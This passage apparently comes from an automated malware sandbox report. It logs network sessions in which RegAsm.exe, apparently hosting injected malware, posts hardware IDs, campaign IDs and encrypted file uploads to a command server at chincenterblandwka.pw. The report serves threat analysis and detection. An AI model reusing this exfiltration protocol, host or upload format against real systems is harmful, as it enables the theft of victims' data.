C6L5wM/kFpl66PT1mTGTsWZW8bO8g/18o+PxqhyrNbCzywBIznF3yG/RudCtHKMNplb4urG+vRWedniXNZ4orYe+rcX/MEb9ZsCc3bkMviT/e7G7jDdUCJNXWaocqzW5p8+8iM541q1i7IHRFSzKEc/bwJapuqwAJ/9ZqhyrNbHGlwBIznF3yG/Q1WQMCZsFzlbxs7yK6TCbP1mjMZoMtaeOnf3HVH79TuCskYUwukT7U8yqgaLhJdJKdLoUm4E
2023-12-27 17:12:42 UTC	1369	IN	Data Raw: 66 58 62 56 44 62 74 4c 76 53 51 31 5a 55 67 74 67 7a 2f 58 2f 79 4f 74 49 76 4d 76 44 74 58 57 61 6f 63 71 7a 57 77 73 71 36 68 69 4d 59 5a 64 38 48 79 56 4f 79 42 68 41 67 65 55 4a 39 33 35 49 72 74 70 76 45 4e 77 6d 6f 52 6f 71 67 44 4e 62 43 79 70 37 54 68 75 6b 48 44 59 47 2f 52 75 64 43 6b 43 50 65 78 5a 6c 62 78 73 37 79 44 2f 41 69 54 58 6b 79 53 46 4d 4d 31 75 5a 65 53 68 64 33 72 61 46 72 56 52 74 53 6b 7a 59 55 77 6f 67 6a 6e 65 39 43 75 6f 5a 4c 64 44 61 4a 69 56 4a 4d 46 68 67 53 63 75 70 63 41 53 4d 35 78 64 38 68 76 30 62 6e 51 72 52 7a 7a 44 61 5a 57 2b 47 4c 31 6c 70 55 31 32 31 61 59 72 31 48 6d 61 49 33 37 74 37 56 56 79 30 68 79 31 58 71 5a 73 57 51 4d 43 5a 73 46 7a 6c 62 77 78 34 77 33 56 41 69 54 56 31 6d 71 48 63 65 42 47 4c 4b 6e Data Ascii: fXbVDbtLvSQ1ZUgtgz/X/yOtIvMvDtXWaocqzWwsq6hiMYZd8HyVOyBhAgeUJ935IrtpvENwmoRoqgDNbCyp7ThukHDYG/RudCkCPexZlbxs7yD/AiTXkySFMM1uZeShd3raFrVRtSkzYUwogjne9CuoZLdDaJiVJMFhgScupcASM5xd8hv0bnQrRzzDaZW+GL1lpU121aYr1HmaI37t7VVy0hy1XqZsWQMCZsFzlbwx4w3VAiTV1mqHceBGLKn
2023-12-27 17:12:42 UTC	1369	IN	Data Raw: 6c 32 65 55 71 49 72 64 69 55 76 54 4d 46 7a 6c 62 78 73 37 79 44 2f 41 47 6e 58 7a 47 72 38 4b 4d 64 75 55 61 58 41 45 6a 4f 63 58 66 49 62 39 47 35 30 4b 31 68 6b 32 33 4f 58 79 79 32 6a 62 4c 70 57 64 39 71 36 4c 38 4e 74 69 44 34 73 78 61 52 75 64 70 35 52 33 7a 48 30 62 6e 51 70 41 6d 62 42 63 35 66 34 62 76 55 67 37 51 34 4a 2f 39 5a 71 68 79 72 4e 62 43 79 70 37 33 35 67 6e 6b 66 79 43 65 52 33 59 7a 67 58 64 4e 46 65 76 37 78 73 37 79 44 2f 41 6e 6e 5a 2b 30 43 48 4b 73 31 73 4c 4b 6d 32 46 52 6d 63 58 66 49 62 39 47 35 30 4b 51 41 79 77 32 6d 56 72 47 44 43 43 76 38 43 4a 4e 58 57 61 6f 63 71 7a 7a 77 75 73 2b 30 36 4e 74 30 4e 6f 6c 2b 31 4f 6a 55 73 66 68 71 41 4a 39 72 78 4a 61 78 63 67 32 35 72 6c 70 63 6d 68 31 6d 5a 49 33 37 6f 71 6e 31 50 Data Ascii: l2eUqIrdiUvTMFzlbxs7yD/AGnXzGr8KMduUaXAEjOcXfIb9G50K1hk23OXyy2jbLpWd9q6L8NtiD4sxaRudp5R3zH0bnQpAmbBc5f4bvUg7Q4J/9ZqhyrNbCyp735gnkfyCeR3YzgXdNFev7xs7yD/AnnZ+0CHKs1sLKm2FRmcXfIb9G50KQAyw2mVrGDCCv8CJNXWaocqzzwus+06Nt0Nol+1OjUsfhqAJ9rxJaxcg25rlpcmh1mZI37oqn1P

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49746	104.21.64.47	443	2992	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 17:12:43 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 641 Host: chincenterblandwka.pw
2023-12-27 17:12:43 UTC	641	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 31 30 45 33 46 34 41 35 32 44 39 46 31 36 42 37 36 39 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 52 4f 4e 39 39 2d 2d 4c 69 76 65 54 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"CRON99--LiveT
2023-12-27 17:12:43 UTC	1333	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:12:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8dau0sh87jii0svn1fs6tq53ls; expires=Sun, 21-Apr-2024 10:59:22 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:12:43 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:12:43 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:12:43 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ycsgmIWBJKISWmS7ULcDwY2LlfWpK%2Bcc6rTC%2BTpM%2BG0cP%2F2oe0ed3KgOadwm7B%2BnDCd40l3JkNOzQmRGeMfYgfPtpDC57YE2xRU9vjxc96NL%2BHXPI66tiyjzIsz3dImi9nv9fuK547Y%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c330a64a01a9eb-DFW alt-svc: h3=":443"; ma=86400
2023-12-27 17:12:43 UTC	28	IN	Data Raw: 31 36 0d 0a 44 65 62 75 67 20 64 61 74 61 20 69 73 20 64 69 73 61 62 6c 65 64 0d 0a Data Ascii: 16Debug data is disabled
2023-12-27 17:12:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49747	104.21.64.47	443	2992	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 17:12:46 UTC	287	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19507 Host: chincenterblandwka.pw
2023-12-27 17:12:46 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 31 30 45 33 46 34 41 35 32 44 39 46 31 36 42 37 36 39 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 52 4f 4e 39 39 2d 2d 4c 69 76 65 54 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"CRON99--LiveT
2023-12-27 17:12:46 UTC	4176	OUT	Data Raw: 41 bb b9 8c 98 dd 7e cd 12 32 f5 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa Data Ascii: A~2MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X\|mn^IUm'
2023-12-27 17:12:46 UTC	1329	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:12:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=h0pjor7nevo1mq2lrtni8de57k; expires=Sun, 21-Apr-2024 10:59:25 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:12:46 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:12:46 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:12:46 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rCLSezyLaAZbGMv23ALNGDK8%2BqyzE5Qhv8qyX6XdAIaH2EjU327xf%2Biaii0S%2BWT6gCNLv0i1hrgIhhIh3vkLtI9EGAkATSW5d3XKp6cN4rv6pi%2FbVgB3KpKlp8MigZLsnYoBIKVj9DA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c330b85ca9aa75-DFW alt-svc: h3=":443"; ma=86400
2023-12-27 17:12:46 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a Data Ascii: fok 212.102.41.2
2023-12-27 17:12:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49748	104.21.64.47	443	2992	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 17:12:48 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 9617 Host: chincenterblandwka.pw
2023-12-27 17:12:48 UTC	9617	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 31 30 45 33 46 34 41 35 32 44 39 46 31 36 42 37 36 39 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 52 4f 4e 39 39 2d 2d 4c 69 76 65 54 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"CRON99--LiveT
2023-12-27 17:12:51 UTC	1327	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:12:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9jjeaik9r4sq8kk7vnhsrjrh2r; expires=Sun, 21-Apr-2024 10:59:28 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:12:49 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:12:49 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:12:49 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RAc4kJ3P12cnklRVp1wi6atbpHzwGv%2FKhp2uiei2CzM8Fyzl7EOqJ6erEFhc6G4zcOfYBfmtqA3m5IiQ%2Fe7zBLshIJeIchv2qya%2FySxg3OI9cpDOeBHvm3opPVWocoANjifBCMPgTxA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c330c58b8de524-DFW alt-svc: h3=":443"; ma=86400
2023-12-27 17:12:51 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a Data Ascii: fok 212.102.41.2
2023-12-27 17:12:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49756	104.21.64.47	443	2992	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 17:12:52 UTC	287	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20443 Host: chincenterblandwka.pw
2023-12-27 17:12:52 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 31 30 45 33 46 34 41 35 32 44 39 46 31 36 42 37 36 39 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 52 4f 4e 39 39 2d 2d 4c 69 76 65 54 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"CRON99--LiveT
2023-12-27 17:12:52 UTC	5112	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 Data Ascii: `M?lrQMn 64F6(X&7~
2023-12-27 17:12:52 UTC	1331	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:12:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0dir94bt6f9s2phjjbigj98hsu; expires=Sun, 21-Apr-2024 10:59:31 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:12:52 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:12:52 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:12:52 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lRV67KQj090W3iC3J4GWsljYEv5NuNp1poH6ZqJ%2BTxti1h0GPR%2F%2BSdLPaPUZgepH8hQlF%2F1qvKwTV9hl%2BwXc2aBxzo0ZsLafa8r3FvO0JQnQmiFmEMgKVwLt6zIOrMP2TySCvoxutGw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c330de1e256b23-DFW alt-svc: h3=":443"; ma=86400
2023-12-27 17:12:52 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a Data Ascii: fok 212.102.41.2
2023-12-27 17:12:52 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49762	104.21.64.47	443	2992	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 17:12:53 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 3758 Host: chincenterblandwka.pw
2023-12-27 17:12:53 UTC	3758	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 31 30 45 33 46 34 41 35 32 44 39 46 31 36 42 37 36 39 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 52 4f 4e 39 39 2d 2d 4c 69 76 65 54 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"CRON99--LiveT
2023-12-27 17:12:54 UTC	1339	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:12:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vrvc627as2kh7plbl66pt4kdlc; expires=Sun, 21-Apr-2024 10:59:32 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:12:53 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:12:53 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:12:53 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fNd5mgEwhsRywQ0JoOTy4UJBNK%2B%2FQrBS2uVbE15BIv8hM6dZQcb3a4WH8X3CMb7CdnjpF1VzVDw%2FP5Xxp%2F7vjZKfV%2FMweZ8n0lB9QPZ5%2FSRn8JdN%2FpJ8%2B0ehKyPb24uABvNDx%2FZmPmU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c330e4eb036c57-DFW alt-svc: h3=":443"; ma=86400
2023-12-27 17:12:54 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a Data Ascii: fok 212.102.41.2
2023-12-27 17:12:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49766	104.21.64.47	443	2992	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 17:12:54 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 795 Host: chincenterblandwka.pw
2023-12-27 17:12:54 UTC	795	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 31 30 45 33 46 34 41 35 32 44 39 46 31 36 42 37 36 39 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 52 4f 4e 39 39 2d 2d 4c 69 76 65 54 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"CRON99--LiveT
